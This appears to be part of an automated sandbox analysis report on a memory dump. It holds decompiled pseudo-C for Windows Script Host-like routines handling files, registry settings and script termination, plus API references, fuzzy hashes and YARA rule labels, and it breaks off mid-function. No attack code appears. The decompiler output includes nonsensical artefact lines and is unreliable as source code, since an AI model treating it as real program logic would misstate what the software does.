                                                        0x00b86f65
                                                        0x00b86f67
                                                        0x00b86f6a
                                                        0x00b86f6f
                                                        0x00b88f0f
                                                        0x00b88f0f
                                                        0x00b86f75
                                                        0x00b86f78
                                                        0x00b86f7d
                                                        0x00b86f82
                                                        0x00b86f85
                                                        0x00b86f87
                                                        0x00b86f89
                                                        0x00b86f8b
                                                        0x00b86f90
                                                        0x00b86f93
                                                        0x00b86f9d
                                                        0x00b87095
                                                        0x00b87095
                                                        0x00b86fad
                                                        0x00b86fc4
                                                        0x00b88f1e
                                                        0x00b88f1e
                                                        0x00b86fd7
                                                        0x00b87004
                                                        0x00000000
                                                        0x00b86fd9
                                                        0x00b86fd9
                                                        0x00b86fdb
                                                        0x00b86fde
                                                        0x00b86fe3
                                                        0x00b86fe3
                                                        0x00b86fec
                                                        0x00b86fee
                                                        0x00b86ff3
                                                        0x00b86ff3
                                                        0x00b86ff9
                                                        0x00b86ffc
                                                        0x00b86ffe
                                                        0x00000000
                                                        0x00b86ffe
                                                        0x00b86fd7
                                                        0x00b87002
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00B86F65
                                                        • MsgWaitForMultipleObjects.USER32 ref: 00B86FAD
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B86FBC
                                                        • GetTickCount.KERNEL32 ref: 00B86FD9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CountTick$MessageMultipleObjectsPeekWait
                                                        • String ID:
                                                        • API String ID: 856712567-0
                                                        • Opcode ID: 8e4d2a9ab0137d39abbbbfc67c24fcaec84c1d4b803f9b930b35bc09d01f418b
                                                        • Instruction ID: 2f07663fa340f8271c2fa0562038229d2f5ebc35db5898e9875700ecfac8b670
                                                        • Opcode Fuzzy Hash: 8e4d2a9ab0137d39abbbbfc67c24fcaec84c1d4b803f9b930b35bc09d01f418b
                                                        • Instruction Fuzzy Hash: 38219A70A0411AA7DB157FA1E988ADE7BBDFF05350F608894E609E61B4EF30C941CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B85539, Relevance: 7.6, APIs: 5, Instructions: 81fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B85539(intOrPtr __ecx, void* __edx, short* _a4, long _a8, long _a12, long _a16, long _a20, intOrPtr _a24) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t26;
				void* _t29;
				void* _t35;
				int _t36;
				void* _t37;
				signed int _t38;
				char* _t39;
				intOrPtr _t41;

				_t35 = __edx;
				_t21 =  *0xb97004; // 0xbb40e64e
				_v8 = _t21 ^ _t38;
				_v16 = __ecx;
				_push(0);
				_t41 =  *0xb97001; // 0x0
				if(_t41 == 0) {
					_t37 = WideCharToMultiByte;
					_t36 = WideCharToMultiByte(0, 0, _a4, 0xffffffff, 0, 0, 0, ??);
					if(_t36 != 0) {
						E00B8320B(_t23);
						_v12 = _t39;
						if(_t39 != 0) {
							if(WideCharToMultiByte(0, 0, _a4, 0xffffffff, _v12, _t36, 0, 0) == 0) {
								goto L6;
							}
							_t29 = CreateFileA(_v12, _a8, _a12, 0, _a16, _a20, 0);
							L2:
							if(_t29 == 0xffffffff) {
								goto L6;
							}
							_t26 = E00B856C1(_v16, _t29, _a24);
							L4:
							return E00B81335(_t26, 0, _v8 ^ _t38, _t35, _t36, _t37);
						}
						_t26 = 0x8007000e;
						goto L4;
					}
					L6:
					_t26 = GetLastError();
					if(_t26 > 0) {
						_t26 = _t26 & 0x0000ffff | 0x80070000;
					}
					goto L4;
				}
				_t29 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, ??);
				goto L2;
			}



















                                                        0x00b85539
                                                        0x00b85541
                                                        0x00b85548
                                                        0x00b85550
                                                        0x00b85553
                                                        0x00b85554
                                                        0x00b8555a
                                                        0x00b899c9
                                                        0x00b899db
                                                        0x00b899df
                                                        0x00b899fe
                                                        0x00b89a03
                                                        0x00b89a08
                                                        0x00b89a25
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89a38
                                                        0x00b85576
                                                        0x00b85579
                                                        0x00000000
                                                        0x00000000
                                                        0x00b85586
                                                        0x00b8558b
                                                        0x00b8559c
                                                        0x00b8559c
                                                        0x00b89a0a
                                                        0x00000000
                                                        0x00b89a0a
                                                        0x00b899e1
                                                        0x00b899e1
                                                        0x00b899e9
                                                        0x00b899f4
                                                        0x00b899f4
                                                        0x00000000
                                                        0x00b899e9
                                                        0x00b85570
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000002,?,00000000,?,00000000,00000000), ref: 00B85570
                                                          • Part of subcall function 00B856C1: GetFileSize.KERNEL32(?,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B856DC
                                                          • Part of subcall function 00B856C1: CreateFileMappingA.KERNEL32 ref: 00B85701
                                                          • Part of subcall function 00B856C1: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B85721
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,00000002,00000000,?,?), ref: 00B899D9
                                                        • GetLastError.KERNEL32(?,?,00000002,00000000,?,?), ref: 00B899E1
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$Create$ByteCharErrorLastMappingMultiSizeViewWide
                                                        • String ID:
                                                        • API String ID: 506574795-0
                                                        • Opcode ID: 011561b489da81d9bbab58c308c0f6c2408430139b2e79fc162367a513ea6475
                                                        • Instruction ID: 85b7661c8e338e1f7ef388188046a76ebca8e077f146a75cbfb2911b749f0ede
                                                        • Opcode Fuzzy Hash: 011561b489da81d9bbab58c308c0f6c2408430139b2e79fc162367a513ea6475
                                                        • Instruction Fuzzy Hash: 15216DB290410DBFDF11AFA48C85DFE7FAEEB05364B104569F621A6070DA358D61DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83415, Relevance: 7.6, APIs: 5, Instructions: 79registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00B83415(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, void** _a16) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				short* _t19;
				long _t20;
				void* _t28;
				void* _t32;
				void* _t34;
				int _t35;
				void* _t37;
				signed int _t39;
				int _t40;
				intOrPtr _t42;

				_t32 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t17 =  *0xb97004; // 0xbb40e64e
				_v8 = _t17 ^ _t39;
				_t42 =  *0xb97001; // 0x0
				if(_t42 == 0) {
					_t19 = _a8;
					__eflags = _t19;
					if(__eflags == 0) {
						L13:
						_v12 = 0;
						L14:
						_t20 = RegOpenKeyExA(_a4, _v12, 0, _a12, _a16);
						L2:
						if(_t20 != 0) {
							L5:
							if(__eflags > 0) {
								_t20 = _t20 & 0x0000ffff | 0x80070000;
							}
							L4:
							_pop(_t34);
							_pop(_t37);
							_pop(_t28);
							return E00B81335(_t20, _t28, _v8 ^ _t39, _t32, _t34, _t37);
						}
						_t20 = 0;
						goto L4;
					}
					__eflags =  *_t19;
					if(__eflags == 0) {
						goto L13;
					}
					_t35 = WideCharToMultiByte(0, 0, _t19, 0xffffffff, 0, 0, 0, 0);
					__eflags = _t35;
					if(_t35 != 0) {
						E00B8320B(_t23);
						_v12 = _t40;
						__eflags = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t35, 0, 0);
						if(__eflags == 0) {
							goto L10;
						}
						goto L14;
					}
					L10:
					_t20 = GetLastError();
					__eflags = _t20;
					goto L5;
				}
				_t20 = RegOpenKeyExW(_a4, _a8, 0, _a12, _a16);
				goto L2;
			}




















                                                        0x00b83415
                                                        0x00b8341a
                                                        0x00b8341b
                                                        0x00b8341c
                                                        0x00b83423
                                                        0x00b8342b
                                                        0x00b83431
                                                        0x00b89613
                                                        0x00b89616
                                                        0x00b89618
                                                        0x00b89660
                                                        0x00b89660
                                                        0x00b89663
                                                        0x00b89670
                                                        0x00b8344a
                                                        0x00b8344c
                                                        0x00b86d8a
                                                        0x00b86d8a
                                                        0x00b86d95
                                                        0x00b86d95
                                                        0x00b83454
                                                        0x00b83457
                                                        0x00b83458
                                                        0x00b83459
                                                        0x00b83465
                                                        0x00b83465
                                                        0x00b83452
                                                        0x00000000
                                                        0x00b83452
                                                        0x00b8961a
                                                        0x00b8961d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89630
                                                        0x00b89632
                                                        0x00b89634
                                                        0x00b89643
                                                        0x00b89648
                                                        0x00b8965a
                                                        0x00b8965c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8965e
                                                        0x00b89636
                                                        0x00b89636
                                                        0x00b8963c
                                                        0x00000000
                                                        0x00b8963c
                                                        0x00b83444
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00020019,80000000,?,?,?,?,00B841E5,80000000), ref: 00B8962E
                                                        • GetLastError.KERNEL32(?,00B841E5,80000000,74BA46CE,00020019,?,74BA46CE), ref: 00B89636
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiOpenWide
                                                        • String ID:
                                                        • API String ID: 881805846-0
                                                        • Opcode ID: 45064a5b46322b7e04a43f29a711f845cdfccd46aa51113f99f6965822adc5dd
                                                        • Instruction ID: 06e4821be67bfbfb0a43444d25d727b97ab573cceba160f2ca25585ef7546ff0
                                                        • Opcode Fuzzy Hash: 45064a5b46322b7e04a43f29a711f845cdfccd46aa51113f99f6965822adc5dd
                                                        • Instruction Fuzzy Hash: E8218BB250410DBF9F11AF94CC84CBE7BEDEB057A4B2445A5F61196170DA318E50DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83B78, Relevance: 7.6, APIs: 5, Instructions: 79registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E00B83B78(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, void** _a16) {
				signed int _v8;
				char* _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				long _t21;
				void* _t26;
				void* _t30;
				int _t32;
				void* _t33;
				void* _t36;
				signed int _t37;
				char* _t38;
				intOrPtr _t40;

				_t30 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t16 =  *0xb97004; // 0xbb40e64e
				_v8 = _t16 ^ _t37;
				_push(0);
				_t40 =  *0xb97001; // 0x0
				if(_t40 == 0) {
					_t32 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, ??);
					__eflags = _t32;
					if(_t32 != 0) {
						E00B8320B(_t18);
						_v12 = _t38;
						__eflags = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t32, 0, 0);
						if(__eflags == 0) {
							goto L8;
						}
						_t21 = RegCreateKeyExA(_a4, _v12, 0, 0, 0, _a12, 0, _a16, 0);
						L2:
						if(_t21 != 0) {
							L5:
							if(__eflags > 0) {
								_t21 = _t21 & 0x0000ffff | 0x80070000;
							}
							L4:
							_pop(_t33);
							_pop(_t36);
							_pop(_t26);
							return E00B81335(_t21, _t26, _v8 ^ _t37, _t30, _t33, _t36);
						}
						_t21 = 0;
						goto L4;
					}
					L8:
					_t21 = GetLastError();
					__eflags = _t21;
					goto L5;
				}
				_t21 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, _a12, 0, _a16, ??);
				goto L2;
			}



















                                                        0x00b83b78
                                                        0x00b83b7d
                                                        0x00b83b7e
                                                        0x00b83b7f
                                                        0x00b83b86
                                                        0x00b83b8e
                                                        0x00b83b8f
                                                        0x00b83b95
                                                        0x00b896a2
                                                        0x00b896a4
                                                        0x00b896a6
                                                        0x00b896b2
                                                        0x00b896b7
                                                        0x00b896c9
                                                        0x00b896cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b896de
                                                        0x00b83bb1
                                                        0x00b83bb3
                                                        0x00b8967b
                                                        0x00b8967b
                                                        0x00b89686
                                                        0x00b89686
                                                        0x00b83bbb
                                                        0x00b83bbe
                                                        0x00b83bbf
                                                        0x00b83bc0
                                                        0x00b83bcc
                                                        0x00b83bcc
                                                        0x00b83bb9
                                                        0x00000000
                                                        0x00b83bb9
                                                        0x00b896a8
                                                        0x00b896a8
                                                        0x00b896ae
                                                        0x00000000
                                                        0x00b896ae
                                                        0x00b83bab
                                                        0x00000000

                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00B82218,00B82238,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B83BAB
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,00B82238,?,00000000,?,?,?,00B83D5D,00B82218), ref: 00B896A0
                                                        • GetLastError.KERNEL32(?,00B83D5D,00B82218,Software\Microsoft\Windows Script Host\Settings,00020019,00B82218,00B8220C,?,?,00B82388,80000002,00000000,?,00B82238,00B82218,00B8221C), ref: 00B896A8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00B82218,00000000,00000000,00000000,?,00B83D5D,00B82218,Software\Microsoft\Windows Script Host\Settings,00020019,00B82218,00B8220C,?), ref: 00B896C7
                                                        • RegCreateKeyExA.ADVAPI32(00B82218,00B82218,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B896DE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharCreateMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3494534822-0
                                                        • Opcode ID: e89895606ea103734d818ce62f1eedf19b3430083d572bda6ad61320367975a2
                                                        • Instruction ID: 54dcb041904e49293a3aef01f668909084aa1d8688f132fee95f3205f39443de
                                                        • Opcode Fuzzy Hash: e89895606ea103734d818ce62f1eedf19b3430083d572bda6ad61320367975a2
                                                        • Instruction Fuzzy Hash: 56216AB250010DBFAF01AFA4DDC4DBF3BADEB453A8B1445A5F61292070DA358D55DB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B93671, Relevance: 7.6, APIs: 5, Instructions: 76registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E00B93671(void* __ecx, void* __edx, void* _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t19;
				void* _t28;
				void* _t32;
				void* _t34;
				int _t35;
				void* _t37;
				signed int _t39;
				int _t40;
				intOrPtr _t42;

				_t32 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t16 =  *0xb97004; // 0xbb40e64e
				_v8 = _t16 ^ _t39;
				_t42 =  *0xb97001; // 0x0
				if(_t42 == 0) {
					if(_a8 == 0) {
						_v12 = 0;
						goto L8;
					} else {
						_t35 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
						if(_t35 != 0) {
							E00B8320B(_t22);
							_v12 = _t40;
							if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v12, _t35, 0, 0) == 0) {
								goto L4;
							} else {
								L8:
								_t19 = RegSetValueExA(_a4, _v12, 0, 4,  &_a12, 4);
							}
						} else {
							L4:
							_t19 = GetLastError();
						}
					}
				} else {
					_t19 = RegSetValueExW(_a4, _a8, 0, 4,  &_a12, 4);
				}
				if(_t19 > 0) {
					_t19 = _t19 & 0x0000ffff | 0x80070000;
				}
				_pop(_t34);
				_pop(_t37);
				_pop(_t28);
				return E00B81335(_t19, _t28, _v8 ^ _t39, _t32, _t34, _t37);
			}



















                                                        0x00b93671
                                                        0x00b93676
                                                        0x00b93677
                                                        0x00b93678
                                                        0x00b9367f
                                                        0x00b93687
                                                        0x00b9368d
                                                        0x00b936a9
                                                        0x00b936e9
                                                        0x00000000
                                                        0x00b936ab
                                                        0x00b936be
                                                        0x00b936c2
                                                        0x00b936cc
                                                        0x00b936d1
                                                        0x00b936e5
                                                        0x00000000
                                                        0x00b936e7
                                                        0x00b936ec
                                                        0x00b936fb
                                                        0x00b936fb
                                                        0x00b936c4
                                                        0x00b936c4
                                                        0x00b936c4
                                                        0x00b936c4
                                                        0x00b936c2
                                                        0x00b9368f
                                                        0x00b9369e
                                                        0x00b9369e
                                                        0x00b93703
                                                        0x00b9370a
                                                        0x00b9370a
                                                        0x00b93712
                                                        0x00b93713
                                                        0x00b93714
                                                        0x00b93720

                                                        APIs
                                                        • RegSetValueExW.ADVAPI32 ref: 00B9369E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00B82238,000000FF,00000000,00000000,00000000,00000000,80000001,?,00000000,?,?,?,00B8F0A3,00B82218), ref: 00B936BC
                                                        • GetLastError.KERNEL32(?,?,?,00B8F0A3,00B82218,Timeout,00000000,80000001,00B82218,Software\Microsoft\Windows Script Host\Settings,00020006,00B82218,00B8220C,?,00B88068,80000001), ref: 00B936C4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiValueWide
                                                        • String ID:
                                                        • API String ID: 2367157299-0
                                                        • Opcode ID: 4c9fbd856190a91f61edb40300194fa43ea1559cf9b79dc0d5219a9a3ffd978f
                                                        • Instruction ID: b31235fa17402b27bf4f63d0dfb8cba8709bfa2cd6cd3443182280e33c4ae06c
                                                        • Opcode Fuzzy Hash: 4c9fbd856190a91f61edb40300194fa43ea1559cf9b79dc0d5219a9a3ffd978f
                                                        • Instruction Fuzzy Hash: E72147B250410DBEEF10AF948C81EBE7FEDEB067A4F248569F611961A0CA358E15DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B856C1, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B856C1(void** __ecx, void* _a4, long _a8) {
				void* _t8;
				long _t10;
				signed int _t11;
				void* _t13;
				void* _t15;
				long _t17;
				long _t20;
				void** _t25;

				_t8 = _a4;
				_t25 = __ecx;
				if(_t8 == 0xffffffff) {
					return 0x8000ffff;
				}
				 *__ecx = _t8;
				_t10 = GetFileSize(_t8, 0);
				_t25[3] = _t10;
				if(_t10 == 0xffffffff) {
					_t11 = GetLastError();
					if(_t11 > 0) {
						_t11 = _t11 & 0x0000ffff | 0x80070000;
					}
					L9:
					return _t11;
				}
				if(_t10 == 0) {
					_t11 = 0;
					goto L9;
				}
				_t17 = _a8;
				_t13 = CreateFileMappingA( *_t25, 0, _t17, 0, _t10, 0);
				_t25[1] = _t13;
				if(_t13 == 0) {
					L18:
					_t11 = GetLastError();
					if(_t11 > 0) {
						_t11 = _t11 & 0x0000ffff | 0x80070000;
					}
					L8:
					goto L9;
				}
				_t20 = 2;
				if(_t17 != _t20) {
					if(_t17 != 4) {
						_t20 = 0 | _t17 == 0x00000008;
					}
				} else {
					_t20 = 4;
				}
				_t15 = MapViewOfFile(_t13, _t20, 0, 0, 0);
				_t25[2] = _t15;
				if(_t15 == 0) {
					goto L18;
				} else {
					_t11 = 0;
					goto L8;
				}
			}











                                                        0x00b856c6
                                                        0x00b856ca
                                                        0x00b856cf
                                                        0x00000000
                                                        0x00b89971
                                                        0x00b856da
                                                        0x00b856dc
                                                        0x00b856e2
                                                        0x00b856e8
                                                        0x00b8997b
                                                        0x00b89983
                                                        0x00b8998e
                                                        0x00b8998e
                                                        0x00b85735
                                                        0x00000000
                                                        0x00b85735
                                                        0x00b856f0
                                                        0x00b89998
                                                        0x00000000
                                                        0x00b89998
                                                        0x00b856f7
                                                        0x00b85701
                                                        0x00b85707
                                                        0x00b8570c
                                                        0x00b899ac
                                                        0x00b899ac
                                                        0x00b899b4
                                                        0x00b899bf
                                                        0x00b899bf
                                                        0x00b85734
                                                        0x00000000
                                                        0x00b85734
                                                        0x00b85714
                                                        0x00b85717
                                                        0x00b8573e
                                                        0x00b899a4
                                                        0x00b899a4
                                                        0x00b85719
                                                        0x00b8571b
                                                        0x00b8571b
                                                        0x00b85721
                                                        0x00b85727
                                                        0x00b8572c
                                                        0x00000000
                                                        0x00b85732
                                                        0x00b85732
                                                        0x00000000
                                                        0x00b85732

                                                        APIs
                                                        • GetFileSize.KERNEL32(?,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B856DC
                                                        • CreateFileMappingA.KERNEL32 ref: 00B85701
                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B85721
                                                        • GetLastError.KERNEL32(?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B8997B
                                                        • GetLastError.KERNEL32(?,?,00B8558B,00000000,?,?,?,00000002,00000000,?,?), ref: 00B899AC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$ErrorLast$CreateMappingSizeView
                                                        • String ID:
                                                        • API String ID: 981448092-0
                                                        • Opcode ID: 7a3f8a287aa81368f6f940d2215983b9ea55644ece7e9c29a96ed91a5086e031
                                                        • Instruction ID: 56479ca4e606a7d6b0bd6d81a2e18dedeaea31629ac491bd9c959111b262ab9f
                                                        • Opcode Fuzzy Hash: 7a3f8a287aa81368f6f940d2215983b9ea55644ece7e9c29a96ed91a5086e031
                                                        • Instruction Fuzzy Hash: 3D11967A211641EEDB347A658C8CD777BECD7C5731B788A6DF116C60B0E5258C40C720
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8D256, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 27%
                                                        			E00B8D256(long long* _a4, char* _a8, int _a12, char _a16, intOrPtr _a20, signed char _a24) {
				signed int _v8;
				char _v39;
				char _v40;
				long long* _v44;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr* _t39;
				void* _t40;
				int _t41;
				int _t42;
				void* _t45;
				intOrPtr _t46;
				char _t47;
				void* _t52;
				char* _t53;
				void* _t54;
				void* _t55;
				char* _t56;
				void* _t57;
				signed int _t58;
				void* _t59;
				long long* _t60;

				_t33 =  *0xb97004; // 0xbb40e64e
				_v8 = _t33 ^ _t58;
				_v44 = _a4;
				_t53 = _a8;
				if((_a24 & 1) != 0) {
					_a16 = _a16 - 0x20;
				}
				_v40 = 0x25;
				if((_a24 & 0x00000080) != 0) {
					_push(2);
					_v39 = 0x23;
					_pop(1);
				}
				 *((char*)(_t58 + 0xffffffffffffffdd)) = 0x2e;
				__imp___itoa(_a20, _t58 + 0xffffffffffffffde, 0xa, _t54);
				_t39 =  &_v40;
				_t60 = _t59 + 0xc;
				_t21 = _t39 + 1; // 0x2f
				_t55 = _t21;
				do {
					_t46 =  *_t39;
					_t39 = _t39 + 1;
				} while (_t46 != 0);
				_t47 = _a16;
				_t40 = _t39 - _t55;
				 *((char*)(_t58 + _t40 - 0x24)) = _t47;
				 *((char*)(_t58 + _t40 - 0x23)) = 0;
				_t41 = _a12;
				_t56 =  &(_t53[_t41 - 1]);
				 *_t56 = 0;
				 *_t60 =  *_v44;
				_t42 = _snprintf(_t53, _t41,  &_v40, _t47, _t47);
				_pop(_t57);
				if( *_t56 != 0 || _t42 <= 0) {
					_push(0x16);
					 *_t53 = 0;
					_pop(0);
				}
				return E00B81335(0, _t45, _v8 ^ _t58, _t52, _t53, _t57);
			}


























                                                        0x00b8d25e
                                                        0x00b8d265
                                                        0x00b8d26b
                                                        0x00b8d272
                                                        0x00b8d278
                                                        0x00b8d27a
                                                        0x00b8d27a
                                                        0x00b8d282
                                                        0x00b8d286
                                                        0x00b8d288
                                                        0x00b8d28a
                                                        0x00b8d28e
                                                        0x00b8d28e
                                                        0x00b8d290
                                                        0x00b8d29f
                                                        0x00b8d2a5
                                                        0x00b8d2a8
                                                        0x00b8d2ab
                                                        0x00b8d2ab
                                                        0x00b8d2ae
                                                        0x00b8d2ae
                                                        0x00b8d2b0
                                                        0x00b8d2b1
                                                        0x00b8d2b5
                                                        0x00b8d2b8
                                                        0x00b8d2ba
                                                        0x00b8d2be
                                                        0x00b8d2c3
                                                        0x00b8d2c6
                                                        0x00b8d2ca
                                                        0x00b8d2d7
                                                        0x00b8d2dd
                                                        0x00b8d2e9
                                                        0x00b8d2ea
                                                        0x00b8d2f4
                                                        0x00b8d2f6
                                                        0x00b8d2f9
                                                        0x00b8d2f9
                                                        0x00b8d306

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: _itoa_snprintf
                                                        • String ID: $#$.
                                                        • API String ID: 3295663647-1065809056
                                                        • Opcode ID: 95dfa785b582297fd035d3d0a7fb096a8d5ae7067868e228ceb31d9a4a9f4b45
                                                        • Instruction ID: a94705a2da39714b0b7f49c6e3d402ff36a59d15326346639a0929f50b62b4eb
                                                        • Opcode Fuzzy Hash: 95dfa785b582297fd035d3d0a7fb096a8d5ae7067868e228ceb31d9a4a9f4b45
                                                        • Instruction Fuzzy Hash: 8721CF3050428A9BDB11DF6CDA48BEE7FE4EF0A304F240499EC80E72D1DA719A16C7A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B86476, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E00B86476(void* __edx, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				char* _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _v52;
				long _v56;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed int _t71;
				intOrPtr* _t79;
				intOrPtr* _t83;
				intOrPtr* _t85;
				signed int _t86;
				signed int _t89;
				signed int _t94;
				intOrPtr _t97;
				void* _t102;
				long _t107;
				void* _t127;
				intOrPtr* _t128;
				signed int _t130;
				signed int _t132;
				intOrPtr* _t134;
				void* _t136;

				 *0xFFFFFFFF49167890 =  *((intOrPtr*)(0xffffffff49167890)) + __edx;
				_t128 = _a8;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_t71 =  *((intOrPtr*)( *_t128 + 0xc))(_t128,  &_v84, _t127, _t102, _t136);
				if(_t71 < 0) {
					L9:
					return _t71;
				} else {
					_t132 = _a4;
					if(E00B86529( *((intOrPtr*)(_t132 + 0x2c))) == 0) {
						_t71 = 0x80004005;
						L8:
						goto L9;
					}
					_t107 = _v56;
					if(_t107 == 0x8004fffc) {
						__eflags =  *(_t132 + 0x51);
						if( *(_t132 + 0x51) == 0) {
							 *(_t132 + 0x51) = 1;
							_t130 = E00B90A12(_t132);
							__eflags = _t130;
							if(_t130 < 0) {
								L6:
								_t134 = __imp__#6;
								 *_t134(_v80);
								 *_t134(_v76);
								 *_t134(_v72);
								 *_t134(_v8);
								 *_t134(_v20);
								_t79 = _v16;
								if(_t79 != 0) {
									 *((intOrPtr*)( *_t79 + 8))(_t79);
								}
								_t71 = _t130;
								goto L8;
							}
							_t130 = E00B90A52(_t132, 0,  &_v16);
							__eflags = _t130;
							if(_t130 < 0) {
								goto L6;
							}
							_t83 = _v16;
							_v28 = 0;
							_v32 = L"WScript_OnScriptTerminate";
							_t130 =  *((intOrPtr*)( *_t83 + 0x14))(_t83, 0xb81804,  &_v32, 1, 0x400,  &_v28);
							__eflags = _t130;
							if(_t130 < 0) {
								__eflags = _t130 - 0x80020006;
								if(_t130 == 0x80020006) {
									L5:
									_t130 = 0;
									goto L6;
								}
								goto L6;
							}
							_t85 = _v16;
							_v52 = 0;
							_v48 = 0;
							_v44 = 0;
							_v40 = 0;
							_t86 =  *((intOrPtr*)( *_t85 + 0x18))(_t85, _v28, 0xb81804, 0x400, 1,  &_v52, 0, 0, 0);
							_t130 = _t86;
							__eflags = _t130;
							if(_t130 >= 0) {
								goto L5;
							}
							goto L6;
						}
						goto L5;
					}
					if(_t107 != 0x8004fffd) {
						__eflags = _t107 - 0x8004fffe;
						if(_t107 == 0x8004fffe) {
							_t130 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x2c)))) + 0x20))();
							goto L6;
						}
						_t89 = _v76;
						_a4 = _t89;
						__eflags = _t89;
						if(_t89 == 0) {
							L20:
							_t130 = E00B8F3F0(_t107,  &_v20);
							__eflags = _t130;
							if(_t130 < 0) {
								goto L6;
							}
							_t128 = _a8;
							_a4 = _v20;
							L22:
